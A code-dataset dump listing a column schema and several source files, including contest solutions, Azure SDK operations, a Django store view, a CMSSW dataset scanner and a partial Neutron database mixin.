blob_id
stringlengths
40
40
directory_id
stringlengths
40
40
path
stringlengths
3
616
content_id
stringlengths
40
40
detected_licenses
listlengths
0
112
license_type
stringclasses
2 values
repo_name
stringlengths
5
115
snapshot_id
stringlengths
40
40
revision_id
stringlengths
40
40
branch_name
stringclasses
777 values
visit_date
timestamp[us]date
2015-08-06 10:31:46
2023-09-06 10:44:38
revision_date
timestamp[us]date
1970-01-01 02:38:32
2037-05-03 13:00:00
committer_date
timestamp[us]date
1970-01-01 02:38:32
2023-09-06 01:08:06
github_id
int64
4.92k
681M
star_events_count
int64
0
209k
fork_events_count
int64
0
110k
gha_license_id
stringclasses
22 values
gha_event_created_at
timestamp[us]date
2012-06-04 01:52:49
2023-09-14 21:59:50
gha_created_at
timestamp[us]date
2008-05-22 07:58:19
2023-08-21 12:35:19
gha_language
stringclasses
149 values
src_encoding
stringclasses
26 values
language
stringclasses
1 value
is_vendor
bool
2 classes
is_generated
bool
2 classes
length_bytes
int64
3
10.2M
extension
stringclasses
188 values
content
stringlengths
3
10.2M
authors
listlengths
1
1
author_id
stringlengths
1
132
baf1e8fce2a2ee27fd127101921e9812b45a1359
ca7aa979e7059467e158830b76673f5b77a0f5a3
/Python_codes/p03564/s294555081.py
483a512c9c4d677d13999a237fea6db9a60e2dad
[]
no_license
Aasthaengg/IBMdataset
7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
refs/heads/main
2023-04-22T10:22:44.763102
2021-05-13T17:27:22
2021-05-13T17:27:22
367,112,348
0
0
null
null
null
null
UTF-8
Python
false
false
127
py
N = int(input()) K = int(input()) a = 1 for i in range(N): if a*2 > a+K: a += K else: a *= 2 print(a)
eb7c2a0bb4df36ca0ef54c23c6537d071bfdd2b2
074421d31af92ae29c7c78bdb7e50f199a38eb9b
/weixin/code/moc_def/moc_name_service/AppInstance.py
41252cf3e8a2d8fe37562e79a7e9fb9cf03cbae0
[]
no_license
allenforrest/wxbiz
3f49ce66b37e281fc375f548610aa54a0f73268f
e78df71fbc5d73dd93ba9452d4b54183fe1e7e1f
refs/heads/master
2016-09-06T15:17:49.420934
2013-08-05T13:13:40
2013-08-05T13:13:40
null
0
0
null
null
null
null
UTF-8
Python
false
false
5,356
py
#coding=gbk import mit from mit import MocBase, MocRule from mit import MocAttrDef, ComplexAttrDef import type_def import err_code_mgr # The automatic generated MOC. It is not recommended to inherit. class AppInstance(MocBase): __MOC_NAME__ = "AppInstance" __IMC_SYNC_PRIORITY__ = mit.IMC_SYNC_NOT_SYNC __ATTR_DEF__ = ( MocAttrDef(name = 'pid', is_key = True, attr_type = type_def.TYPE_UINT32, max_len = 0), MocAttrDef(name = 'instance_name', is_key = False, attr_type = type_def.TYPE_STRING, max_len = 64), MocAttrDef(name = 'service_name', is_key = False, attr_type = type_def.TYPE_STRING, max_len = 64), MocAttrDef(name = 'instance_id', is_key = False, attr_type = type_def.TYPE_UINT32, max_len = 0), MocAttrDef(name = 'system_ip', is_key = False, attr_type = type_def.TYPE_STRING, max_len = 64), MocAttrDef(name = 'node_type', is_key = False, attr_type = type_def.TYPE_STRING, max_len = 64), MocAttrDef(name = 'endpoint', is_key = False, attr_type = type_def.TYPE_STRING, max_len = 64), MocAttrDef(name = 'endpoint_protocol', is_key = False, attr_type = type_def.TYPE_STRING, max_len = 64), MocAttrDef(name = 'update_time', is_key = False, attr_type = type_def.TYPE_UINT32, max_len = 64), MocAttrDef(name = 'state', is_key = False, attr_type = type_def.TYPE_STRING, max_len = 64), ) __COMPLEX_ATTR_DEF__ = ( ) __ATTR_DEF_MAP__ = {attr.name:attr for attr in __ATTR_DEF__ + __COMPLEX_ATTR_DEF__} __ATTR_INDEX__ = () __SQLITE_SELECT_SQL__ = 'select [moid], [pid], [instance_name], [service_name], [instance_id], [system_ip], [node_type], [endpoint], [endpoint_protocol], [update_time], [state] from tbl_AppInstance' __ORACLE_SELECT_SQL__ = 'select "moid", "pid", "instance_name", "service_name", "instance_id", "system_ip", "node_type", "endpoint", "endpoint_protocol", "update_time", "state" from tbl_AppInstance' __SQLITE_INSERT_SQL__ = 'insert into tbl_AppInstance ([moid], [pid], [instance_name], [service_name], [instance_id], [system_ip], [node_type], [endpoint], [endpoint_protocol], [update_time], [state]) values(?1, ?2, ?3, ?4, ?5, ?6, ?7, ?8, ?9, ?10, ?11)' __ORACLE_INSERT_SQL__ = 'insert into tbl_AppInstance ("moid", "pid", "instance_name", "service_name", "instance_id", "system_ip", "node_type", "endpoint", "endpoint_protocol", "update_time", "state") values(:1, :2, :3, :4, :5, :6, :7, :8, :9, :10, :11)' __SQLITE_UPDATE_SQL__ = 'update tbl_AppInstance set [instance_name]=?1, [service_name]=?2, [instance_id]=?3, [system_ip]=?4, [node_type]=?5, [endpoint]=?6, [endpoint_protocol]=?7, [update_time]=?8, [state]=?9 where [moid]=?10' __ORACLE_UPDATE_SQL__ = 'update tbl_AppInstance set "instance_name"=:1, "service_name"=:2, "instance_id"=:3, "system_ip"=:4, "node_type"=:5, "endpoint"=:6, "endpoint_protocol"=:7, "update_time"=:8, "state"=:9 where "moid"=:10' pid = 0 instance_name = '' service_name = '' instance_id = 0 system_ip = '' node_type = '' endpoint = '' endpoint_protocol = '' update_time = 0 state = '' @classmethod def gen_moid(cls, **kw): return "AppInstance_%d" % (kw["pid"]) def get_moid(self): return "AppInstance_%d" % (self.pid) @classmethod def get_attr_names(cls): return ('pid',), ('instance_name', 'service_name', 'instance_id', 'system_ip', 'node_type', 'endpoint', 'endpoint_protocol', 'update_time', 'state') def from_db_record(self, record): self.pid = record[1] self.instance_name = record[2] self.service_name = record[3] self.instance_id = record[4] self.system_ip = record[5] self.node_type = record[6] self.endpoint = record[7] self.endpoint_protocol = record[8] self.update_time = record[9] self.state = record[10] def to_db_record(self): return [self.get_moid() , self.pid , self.instance_name , self.service_name , self.instance_id , self.system_ip , self.node_type , self.endpoint , self.endpoint_protocol , self.update_time , self.state ] def to_db_record_for_update(self): return [ self.instance_name , self.service_name , self.instance_id , self.system_ip , self.node_type , self.endpoint , self.endpoint_protocol , self.update_time , self.state , self.get_moid() ] # The automatic generated rule. class AppInstanceRule(MocRule): pass
ada4adc8aad13242a94e5cb34122128661463484
f576f0ea3725d54bd2551883901b25b863fe6688
/sdk/recoveryservices/azure-mgmt-recoveryservicesbackup/azure/mgmt/recoveryservicesbackup/activestamp/aio/operations/_backup_protection_containers_operations.py
b6c5c15dd38539be1b961241d550d8eab0ed5a1e
[ "LicenseRef-scancode-generic-cla", "MIT", "LGPL-2.1-or-later" ]
permissive
Azure/azure-sdk-for-python
02e3838e53a33d8ba27e9bcc22bd84e790e4ca7c
c2ca191e736bb06bfbbbc9493e8325763ba990bb
refs/heads/main
2023-09-06T09:30:13.135012
2023-09-06T01:08:06
2023-09-06T01:08:06
4,127,088
4,046
2,755
MIT
2023-09-14T21:48:49
2012-04-24T16:46:12
Python
UTF-8
Python
false
false
6,734
py
# pylint: disable=too-many-lines # coding=utf-8 # -------------------------------------------------------------------------- # Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the MIT License. See License.txt in the project root for license information. # Code generated by Microsoft (R) AutoRest Code Generator. # Changes may cause incorrect behavior and will be lost if the code is regenerated. # -------------------------------------------------------------------------- from typing import Any, AsyncIterable, Callable, Dict, Optional, TypeVar import urllib.parse from azure.core.async_paging import AsyncItemPaged, AsyncList from azure.core.exceptions import ( ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, ResourceNotModifiedError, map_error, ) from azure.core.pipeline import PipelineResponse from azure.core.pipeline.transport import AsyncHttpResponse from azure.core.rest import HttpRequest from azure.core.tracing.decorator import distributed_trace from azure.core.utils import case_insensitive_dict from azure.mgmt.core.exceptions import ARMErrorFormat from ... import models as _models from ..._vendor import _convert_request from ...operations._backup_protection_containers_operations import build_list_request from .._vendor import RecoveryServicesBackupClientMixinABC T = TypeVar("T") ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]] class BackupProtectionContainersOperations: """ .. warning:: **DO NOT** instantiate this class directly. Instead, you should access the following operations through :class:`~azure.mgmt.recoveryservicesbackup.activestamp.aio.RecoveryServicesBackupClient`'s :attr:`backup_protection_containers` attribute. """ models = _models def __init__(self, *args, **kwargs) -> None: input_args = list(args) self._client = input_args.pop(0) if input_args else kwargs.pop("client") self._config = input_args.pop(0) if input_args else kwargs.pop("config") self._serialize = input_args.pop(0) if input_args else kwargs.pop("serializer") self._deserialize = input_args.pop(0) if input_args else kwargs.pop("deserializer") @distributed_trace def list( self, vault_name: str, resource_group_name: str, filter: Optional[str] = None, **kwargs: Any ) -> AsyncIterable["_models.ProtectionContainerResource"]: """Lists the containers registered to Recovery Services Vault. :param vault_name: The name of the recovery services vault. Required. :type vault_name: str :param resource_group_name: The name of the resource group where the recovery services vault is present. Required. :type resource_group_name: str :param filter: OData filter options. Default value is None. :type filter: str :keyword callable cls: A custom type or function that will be passed the direct response :return: An iterator like instance of either ProtectionContainerResource or the result of cls(response) :rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.recoveryservicesbackup.activestamp.models.ProtectionContainerResource] :raises ~azure.core.exceptions.HttpResponseError: """ _headers = kwargs.pop("headers", {}) or {} _params = case_insensitive_dict(kwargs.pop("params", {}) or {}) api_version: str = kwargs.pop("api_version", _params.pop("api-version", self._config.api_version)) cls: ClsType[_models.ProtectionContainerResourceList] = kwargs.pop("cls", None) error_map = { 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError, 304: ResourceNotModifiedError, } error_map.update(kwargs.pop("error_map", {}) or {}) def prepare_request(next_link=None): if not next_link: request = build_list_request( vault_name=vault_name, resource_group_name=resource_group_name, subscription_id=self._config.subscription_id, filter=filter, api_version=api_version, template_url=self.list.metadata["url"], headers=_headers, params=_params, ) request = _convert_request(request) request.url = self._client.format_url(request.url) else: # make call to next link with the client's api-version _parsed_next_link = urllib.parse.urlparse(next_link) _next_request_params = case_insensitive_dict( { key: [urllib.parse.quote(v) for v in value] for key, value in urllib.parse.parse_qs(_parsed_next_link.query).items() } ) _next_request_params["api-version"] = self._config.api_version request = HttpRequest( "GET", urllib.parse.urljoin(next_link, _parsed_next_link.path), params=_next_request_params ) request = _convert_request(request) request.url = self._client.format_url(request.url) request.method = "GET" return request async def extract_data(pipeline_response): deserialized = self._deserialize("ProtectionContainerResourceList", pipeline_response) list_of_elem = deserialized.value if cls: list_of_elem = cls(list_of_elem) # type: ignore return deserialized.next_link or None, AsyncList(list_of_elem) async def get_next(next_link=None): request = prepare_request(next_link) _stream = False pipeline_response: PipelineResponse = await self._client._pipeline.run( # pylint: disable=protected-access request, stream=_stream, **kwargs ) response = pipeline_response.http_response if response.status_code not in [200]: map_error(status_code=response.status_code, response=response, error_map=error_map) raise HttpResponseError(response=response, error_format=ARMErrorFormat) return pipeline_response return AsyncItemPaged(get_next, extract_data) list.metadata = { "url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.RecoveryServices/vaults/{vaultName}/backupProtectionContainers" }
f13aa73d31a2841260ea3b48e0adb7200deb0fda
d8fe3b5243bec2b61fd7907c4ff799b24bb617e5
/Bloomberg_codecon/General_challenger_problems/mug_color.py
65d046ed2e35e926aa298629faa04dc9adabde17
[ "Unlicense" ]
permissive
SelvorWhim/competitive
b89ed252512d88d9346d168dc6b48e0a42a6142d
1c73a5c7b2d0dc1b6c4f3f06ace69cdf5c6a34c0
refs/heads/master
2023-04-13T01:02:52.083519
2023-04-11T10:14:38
2023-04-11T10:14:38
96,573,533
0
0
null
null
null
null
UTF-8
Python
false
false
1,927
py
### INSTRUCTIONS ### ''' Jay S. has got himself in trouble! He had borrowed a friend's coffee mug and somehow lost it. As his friend will be extremely angry when he finds out about it, Jay has decided to buy his friend a replacement mug to try to control the damage. Unfortunately, Jay does not remember the color of the mug he had borrowed. He only knows that the color was one of White, Black, Blue, Red or Yellow. Jay goes around his office asking his colleagues if they are able to recall the color but his friends don't seem to remember the color of the mug either. What they do know is what color the mug definitely was not. Based on this information, help Jay figure out what the color of the mug was. > Input Specifications Your program will take An input N (1 <= N <= 1,000,000) which denotes the number of people Jay questions regarding the mug. This will be followed by N strings S[1],S[2]...S[N] where S[I] denotes the response of person I to Jay's question which is what color the mug definitely was not. S[I] will also be only one of the 5 colors namely White, Black, Blue, Red or Yellow. > Output Specifications Based on the input, print out the color of the mug. The color of the mug can only be one of the 5 colors namely White, Black, Blue, Red or Yellow. You can safely assume that there always exists only one unique color that the mug can have. ''' ### MY SOLUTION (accepted) ### #Problem : Mug Color #Language : Python 3 #Compiled Using : py_compile #Version : Python 3.4.3 #Input for your program will be provided from STDIN #Print out all output from your program to STDOUT import sys colors=['White', 'Black', 'Blue', 'Red', 'Yellow'] data = sys.stdin.read().splitlines() N = int(data[0]) for color in data[1:] : if color in colors: colors.remove(color) print(colors[0]) # assumed exactly one remains. If more, will be first available. If none, error.
8acf70af05ca1f9fe91e400f1a44d60679f4a416
f576f0ea3725d54bd2551883901b25b863fe6688
/sdk/resourcemover/azure-mgmt-resourcemover/generated_samples/operations_discovery_get.py
2935b57661f79c96fcc7c1c5296b30643fa3afc0
[ "LicenseRef-scancode-generic-cla", "MIT", "LGPL-2.1-or-later" ]
permissive
Azure/azure-sdk-for-python
02e3838e53a33d8ba27e9bcc22bd84e790e4ca7c
c2ca191e736bb06bfbbbc9493e8325763ba990bb
refs/heads/main
2023-09-06T09:30:13.135012
2023-09-06T01:08:06
2023-09-06T01:08:06
4,127,088
4,046
2,755
MIT
2023-09-14T21:48:49
2012-04-24T16:46:12
Python
UTF-8
Python
false
false
1,503
py
# coding=utf-8 # -------------------------------------------------------------------------- # Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the MIT License. See License.txt in the project root for license information. # Code generated by Microsoft (R) AutoRest Code Generator. # Changes may cause incorrect behavior and will be lost if the code is regenerated. # -------------------------------------------------------------------------- from azure.identity import DefaultAzureCredential from azure.mgmt.resourcemover import ResourceMoverServiceAPI """ # PREREQUISITES pip install azure-identity pip install azure-mgmt-resourcemover # USAGE python operations_discovery_get.py Before run the sample, please set the values of the client ID, tenant ID and client secret of the AAD application as environment variables: AZURE_CLIENT_ID, AZURE_TENANT_ID, AZURE_CLIENT_SECRET. For more info about how to get the value, please see: https://docs.microsoft.com/azure/active-directory/develop/howto-create-service-principal-portal """ def main(): client = ResourceMoverServiceAPI( credential=DefaultAzureCredential(), subscription_id="c183865e-6077-46f2-a3b1-deb0f4f4650a", ) response = client.operations_discovery.get() print(response) # x-ms-original-file: specification/resourcemover/resource-manager/Microsoft.Migrate/stable/2021-08-01/examples/OperationsDiscovery_Get.json if __name__ == "__main__": main()
3d53fe5bfcc78cbe0f91bd04f98035197e584aa3
d7ccb4225f623139995a7039f0981e89bf6365a4
/.history/store/views_20211011174414.py
b3aa780e17766d12a299e017068f39c7ef8a9c6c
[]
no_license
tonnymuchui/django-mall
64fd4abc3725c1bd0a3dcf20b93b490fe9307b37
55c083d8433be3c77adc61939cd197902de4ce76
refs/heads/master
2023-08-23T04:59:20.418732
2021-10-13T15:59:37
2021-10-13T15:59:37
415,668,388
1
0
null
null
null
null
UTF-8
Python
false
false
1,356
py
from django.shortcuts import get_object_or_404, render from store.models import Product from category.models import Category from carts.views import _cart_id from carts.models import CartItem from django.core.paginator import EmptyPage, PageNotAnInteger, Paginator # Create your views here. def store(request, category_slug=None): categories = None products = None if category_slug is not None: categories = get_object_or_404(Category, slug=category_slug) products = Product.objects.filter(category=categories, is_available=True) products_count = products.count() else: products = Product.objects.all().filter(is_available=True) products_count = products.count() content = { 'products': products, 'products_count': products_count, } return render(request, 'store/store.html', content) def product_detail(request, category_slug, product_slug): try: single_product = Product.objects.get(category__slug=category_slug, slug=product_slug) in_cart = CartItem.objects.filter(cart__cart_id=_cart_id(request), product=single_product).exists() except Exception as e: raise e content = { 'single_product': single_product, 'in_cart': in_cart, } return render(request, 'store/product_detail.html', content)
37170c7468eb730c386bcbb10eae65fbcf0897c5
b8a13ecb7c0999954807e80c7470d8f752a3653b
/LearnPythonTheHardWay/Python3/ex13-more.py
6ebf367feb72eaf15feceea90b4b64c2e17c6b07
[]
no_license
jbarcia/Python-Books
59ca3d7b7fb1f2c1e3d1659f846032382af557a9
2106a2e5f56cdd4261bf870798a0a427d6137249
refs/heads/master
2021-01-19T00:24:59.727307
2017-01-05T00:07:13
2017-01-05T00:07:13
62,562,390
2
0
null
null
null
null
UTF-8
Python
false
false
355
py
#!/bin/python3 # ex13: Parameters, Unpacking, Variables # Write a script that has more arguments. from sys import argv script, name, age, height, weight = argv print("The script is called:", script) print("Your name is:", name) print("Your age is:", age) print("Your height is %d inches" % int(height)) print("Your weight is %d pounds" % int(weight))
0c6ccdf28c7badab191e6122f4cf3b23b1815669
f98de2db6b24d30d64f1145c7d8da4a40385a87f
/packages/grid_control_cms/scanner_cmssw.py
a23fc63e17f368f98fd9f72208b9a337e638e988
[]
no_license
greyxray/grid-control
f9f453491fe7bc506d4cfc240afaa364ba9db84b
ed10fdb6ff604006a5d52dcd43c2e55c9e962c0a
refs/heads/master
2020-04-15T13:15:21.103357
2019-01-08T18:23:07
2019-01-08T18:23:07
164,709,043
1
0
null
null
null
null
UTF-8
Python
false
false
8,694
py
# | Copyright 2010-2016 Karlsruhe Institute of Technology # | # | Licensed under the Apache License, Version 2.0 (the "License"); # | you may not use this file except in compliance with the License. # | You may obtain a copy of the License at # | # | http://www.apache.org/licenses/LICENSE-2.0 # | # | Unless required by applicable law or agreed to in writing, software # | distributed under the License is distributed on an "AS IS" BASIS, # | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # | See the License for the specific language governing permissions and # | limitations under the License. import os, re, xml.dom.minidom from grid_control import utils from grid_control.config import triggerResync from grid_control.datasets import DatasetError from grid_control.datasets.provider_scan import GCProviderSetup from grid_control.datasets.scanner_base import InfoScanner from python_compat import all, bytes2str, ifilter, imap, lfilter, tarfile triggerDataResync = triggerResync(['datasets', 'parameters']) class GCProviderSetup_CMSSW(GCProviderSetup): scan_pipeline = ['ObjectsFromCMSSW', 'JobInfoFromOutputDir', 'FilesFromJobInfo', 'MatchOnFilename', 'MatchDelimeter', 'MetadataFromCMSSW', 'SEListFromPath', 'LFNFromPath', 'DetermineEvents', 'AddFilePrefix'] def readTag(base, tag, default = None): try: return str(base.getElementsByTagName(tag)[0].childNodes[0].data) except Exception: return default def readList(base, container, items): try: return base.getElementsByTagName(container)[0].getElementsByTagName(items) except Exception: return [] class ObjectsFromCMSSW(InfoScanner): def __init__(self, config): InfoScanner.__init__(self, config) self._importParents = config.getBool('include parent infos', False, onChange = triggerResync(['datasets', 'parameters'])) self._mergeKey = 'CMSSW_CONFIG_FILE' if config.getBool('merge config infos', True, onChange = triggerResync(['datasets', 'parameters'])): self._mergeKey = 'CMSSW_CONFIG_HASH' self._cfgStore = {} self._gtStore = {} self._regexAnnotation = re.compile(r'.*annotation.*=.*cms.untracked.string.*\((.*)\)') self._regexDataTier = re.compile(r'.*dataTier.*=.*cms.untracked.string.*\((.*)\)') def _processCfg(self, tar, cfg): cfgSummary = {} cfgContent = bytes2str(tar.extractfile('%s/config' % cfg).read()) cfgHashResult = bytes2str(tar.extractfile('%s/hash' % cfg).read()).splitlines() cfgHash = cfgHashResult[-1].strip() cfgSummary = {'CMSSW_CONFIG_FILE': cfg, 'CMSSW_CONFIG_HASH': cfgHash} cfgSummary['CMSSW_CONFIG_CONTENT'] = self._cfgStore.setdefault(cfgSummary[self._mergeKey], cfgContent) # Read global tag from config file - first from hash file, then from config file if cfgHash not in self._gtStore: gtLines = lfilter(lambda x: x.startswith('globaltag:'), cfgHashResult) if gtLines: self._gtStore[cfgHash] = gtLines[-1].split(':')[1].strip() if cfgHash not in self._gtStore: try: cfgContentEnv = utils.execWrapper(cfgContent) self._gtStore[cfgHash] = cfgContentEnv['process'].GlobalTag.globaltag.value() except Exception: self._gtStore[cfgHash] = 'unknown:All' cfgSummary['CMSSW_GLOBALTAG'] = self._gtStore[cfgHash] # Get annotation from config content def searchConfigFile(key, regex, default): try: cfgSummary[key] = regex.search(cfgContent).group(1).strip('\"\' ') or default except Exception: cfgSummary[key] = default searchConfigFile('CMSSW_ANNOTATION', self._regexAnnotation, None) searchConfigFile('CMSSW_DATATIER', self._regexDataTier, 'USER') cfgReport = xml.dom.minidom.parseString(bytes2str(tar.extractfile('%s/report.xml' % cfg).read())) evRead = sum(imap(lambda x: int(readTag(x, 'EventsRead')), cfgReport.getElementsByTagName('InputFile'))) return (cfgSummary, cfgReport, evRead) def _processOutputFile(self, cfgReport, outputFile): fileSummary = {'CMSSW_DATATYPE': readTag(outputFile, 'DataType'), 'CMSSW_EVENTS_WRITE': int(readTag(outputFile, 'TotalEvents'))} # Read lumisection infos lumis = [] for run in readList(outputFile, 'Runs', 'Run'): runId = int(run.getAttribute('ID')) for lumi in run.getElementsByTagName('LumiSection'): lumis.append((runId, int(lumi.getAttribute('ID')))) fileSummary['CMSSW_LUMIS'] = lumis # Read parent infos if self._importParents: inputs = readList(outputFile, 'Inputs', 'Input') fileSummary.update({'CMSSW_PARENT_PFN': [], 'CMSSW_PARENT_LFN': []}) for inputFileElement in inputs: pfn = readTag(inputFileElement, 'PFN') lfn = readTag(inputFileElement, 'LFN') if not lfn: lfn = pfn[pfn.find('/store/'):] fileSummary['CMSSW_PARENT_PFN'].append(pfn) fileSummary['CMSSW_PARENT_LFN'].append(lfn) pfn = readTag(outputFile, 'PFN').split(':')[-1] return (fileSummary, pfn) def _processSteps(self, jobNum, tar, cfgSummaryMap, fileSummaryMap): cmsswVersion = bytes2str(tar.extractfile('version').read()).strip() for cfg in ifilter(lambda x: ('/' not in x) and (x not in ['version', 'files']), tar.getnames()): try: (cfgSummary, cfgReport, evRead) = self._processCfg(tar, cfg) cfgSummary['CMSSW_VERSION'] = cmsswVersion cfgSummaryMap[cfg] = cfgSummary except Exception: raise DatasetError('Could not read config infos about %s in job %d' % (cfg, jobNum)) for outputFile in cfgReport.getElementsByTagName('File'): (fileSummary, pfn) = self._processOutputFile(cfgReport, outputFile) fileSummary['CMSSW_EVENTS_READ'] = evRead fileSummary['CMSSW_CONFIG_FILE'] = cfg fileSummaryMap.setdefault(pfn, {}).update(fileSummary) def getEntries(self, path, metadata, events, seList, objStore): jobNum = metadata['GC_JOBNUM'] cmsRunLog = os.path.join(path, 'cmssw.dbs.tar.gz') if os.path.exists(cmsRunLog): tar = tarfile.open(cmsRunLog, 'r') # Collect infos about transferred files fileSummaryMap = {} try: for rawdata in imap(lambda value: bytes2str(value).split(), tar.extractfile('files').readlines()): fileSummaryMap[rawdata[2]] = {'SE_OUTPUT_HASH_CRC32': rawdata[0], 'SE_OUTPUT_SIZE': int(rawdata[1])} objStore['CMSSW_FILES'] = fileSummaryMap except Exception: raise DatasetError('Could not read CMSSW file infos for job %d!' % jobNum) # Collect infos about CMSSW processing steps cfgSummaryMap = {} self._processSteps(jobNum, tar, cfgSummaryMap, fileSummaryMap) for cfg in cfgSummaryMap: metadata.setdefault('CMSSW_CONFIG_JOBHASH', []).append(cfgSummaryMap[cfg]['CMSSW_CONFIG_HASH']) objStore.update({'CMSSW_CONFIG': cfgSummaryMap, 'CMSSW_FILES': fileSummaryMap}) tar.close() yield (path, metadata, events, seList, objStore) class MetadataFromCMSSW(InfoScanner): def __init__(self, config): InfoScanner.__init__(self, config) self.includeConfig = config.getBool('include config infos', False, onChange = triggerResync(['datasets', 'parameters'])) def getEntries(self, path, metadata, events, seList, objStore): cmssw_files_dict = objStore.get('CMSSW_FILES', {}) metadata.update(cmssw_files_dict.get(metadata.get('SE_OUTPUT_FILE'), {})) if self.includeConfig: cmssw_config_dict = objStore.get('CMSSW_CONFIG', {}) metadata.update(cmssw_config_dict.get(metadata.get('CMSSW_CONFIG_FILE'), {})) yield (path, metadata, events, seList, objStore) class SEListFromPath(InfoScanner): def getEntries(self, path, metadata, events, seList, objStore): tmp = path.split(':', 1) if len(tmp) == 1: tmp = ['dir', tmp[0]] proto, fn = tmp if proto in ['dir', 'file']: yield (path, metadata, events, ['localhost'], objStore) elif proto in ['rfio']: if 'cern.ch' in path: yield (path, metadata, events, ['caf.cern.ch'], objStore) else: yield (path, metadata, events, [fn.lstrip('/').split('/')[1]], objStore) elif proto in ['srm', 'gsiftp']: yield (path, metadata, events, [fn.split(':')[0].lstrip('/').split('/')[0]], objStore) else: yield (path, metadata, events, seList, objStore) class LFNFromPath(InfoScanner): def __init__(self, config): InfoScanner.__init__(self, config) self.stripPath = config.get('lfn marker', '/store/', onChange = triggerResync(['datasets', 'parameters'])) def getEntries(self, path, metadata, events, seList, objStore): if self.stripPath and self.stripPath in path: yield (self.stripPath + path.split(self.stripPath, 1)[1], metadata, events, seList, objStore) else: yield (path, metadata, events, seList, objStore) class FilterEDMFiles(InfoScanner): def getEntries(self, path, metadata, events, seList, objStore): if all(imap(lambda x: x in metadata, ['CMSSW_EVENTS_WRITE', 'CMSSW_CONFIG_FILE'])): yield (path, metadata, events, seList, objStore)
2672ebf95d24a74fd6bfb9c7ca5948697ef1cc80
b3fa4bb31add76bbff0b6f864f433ff9af7897b6
/109.sortedListToBST.py
751ed76c2ec1801eb87a6f002d30123f3f262fbb
[]
no_license
Aissen-Li/LeetCode
7298225ba95d58194a5fc87c7ee3ef4d04ec4d4b
f08628e3ce639d1e3f35a2bd3af14cc2b67d7249
refs/heads/master
2020-12-30T08:03:17.277924
2020-09-25T08:20:53
2020-09-25T08:20:53
238,919,619
0
0
null
null
null
null
UTF-8
Python
false
false
834
py
# Definition for singly-linked list. class ListNode: def __init__(self, x): self.val = x self.next = None # Definition for a binary tree node. class TreeNode: def __init__(self, x): self.val = x self.left = None self.right = None class Solution: def sortedListToBST(self, head: ListNode) -> TreeNode: slow, fast = head ,head leftEnd = None while fast and fast.next: leftEnd = slow slow = slow.next fast = fast.next.next if head == slow: return TreeNode(slow.val) root = TreeNode(slow.val) if leftEnd: leftEnd.next = None rightStart = slow.next root.left = self.sortedListToBST(head) root.right = self.sortedListToBST(rightStart) return root
adf993aa0cb6b57623219bbff2eea82c09956c47
dddbfd8eb6dff0bd3449bac87ee76b5c3e0bdfb1
/icehouse-patches/neutron/vlan2vlan/neutron/db/cascade_db.py
d3e520ea4be1bb85b014269fd52aa828589bc05c
[ "Apache-2.0" ]
permissive
joey5678/tricircle
40897fed8fe9d6772e8878b4f06ba1a829636488
e211f7efef129bbfb038cc05232ea1de33f82a97
refs/heads/master
2021-01-17T21:04:32.945469
2014-11-17T09:46:29
2014-11-17T10:10:07
null
0
0
null
null
null
null
UTF-8
Python
false
false
6,542
py
''' Created on 2014-8-5 @author: j00209498 ''' from oslo.db import exception as db_exc import sqlalchemy as sa from neutron.api.rpc.agentnotifiers import l3_rpc_agent_api from neutron.common import exceptions as q_exc from neutron.common import log from neutron.common import utils from neutron.db import model_base from neutron.extensions import dvr as ext_dvr from neutron import manager from neutron.openstack.common import log as logging from oslo.config import cfg from sqlalchemy.orm import exc LOG = logging.getLogger(__name__) big2layer_vni_opts = [ cfg.StrOpt('big2layer_vni_range', default="4097:20000", help=_('The big 2 layer vxlan vni range used for ' 'CascadeDBMixin instances by Neutron')), ] cfg.CONF.register_opts(big2layer_vni_opts) class CascadeAZNetworkBinding(model_base.BASEV2): """Represents a v2 neutron distributed virtual router mac address.""" __tablename__ = 'cascade_az_network_bind' network_id = sa.Column(sa.String(36), primary_key=True, nullable=False) host = sa.Column(sa.String(255), primary_key=True, nullable=False) class CascadeRouterAZExternipMapping(model_base.BASEV2): """Represents a v2 neutron distributed virtual router mac address.""" __tablename__ = 'cascade_router_az_externip_map' router_id = sa.Column(sa.String(36), primary_key=True, nullable=False) host = sa.Column(sa.String(255), primary_key=True, nullable=False) extern_ip = sa.Column(sa.String(64), nullable=False) class CascadeDBMixin(object): @property def l3_rpc_notifier(self): if not hasattr(self, '_l3_rpc_notifier'): self._l3_rpc_notifier = l3_rpc_agent_api.L3AgentNotifyAPI() return self._l3_rpc_notifier def is_big2layer_vni(self, seg_id): vni = cfg.CONF.big2layer_vni_range.split(':') if(seg_id >= int(vni[0]) and seg_id <= int(vni[1])): return True else: return False def get_binding_az_by_network_id(self, context, net_id): try: query = context.session.query(CascadeAZNetworkBinding) ban = query.filter( CascadeAZNetworkBinding.network_id == net_id).one() except exc.NoResultFound: return None return ban['host'] def add_binding_az_network_id(self, context, binding_host, net_id): try: with context.session.begin(subtransactions=True): dvr_mac_binding = CascadeAZNetworkBinding( network_id=net_id, host=binding_host) context.session.add(dvr_mac_binding) LOG.debug("add az_host %(host)s for network %(network_id)s ", {'host': binding_host, 'network_id': net_id}) except db_exc.DBDuplicateEntry: LOG.debug("az_host %(host)s exists for network %(network_id)s," " DBDuplicateEntry error.", {'host': binding_host, 'network_id': net_id}) def get_extern_ip_by_router_id_and_host(self, context, router_id, host): rae = self.get_router_az_extern_ip_mapping(context, router_id, host) if(rae): return rae['extern_ip'] return None # try: # query = context.session.query(CascadeRouterAZExternipMapping) # erh = query.filter( # CascadeRouterAZExternipMapping.router_id == router_id, # CascadeRouterAZExternipMapping.host == host).one() # except exc.NoResultFound: # return None # return erh['extern_ip'] def get_router_az_extern_ip_mapping(self, context, router_id, host): try: query = context.session.query(CascadeRouterAZExternipMapping) erh = query.filter( CascadeRouterAZExternipMapping.router_id == router_id, CascadeRouterAZExternipMapping.host == host).one() except exc.NoResultFound: return None return erh def update_router_az_extern_ip_mapping(self, context, router_id, host, extern_ip): if extern_ip is None: self.del_router_az_extern_ip_mapping(context, router_id, 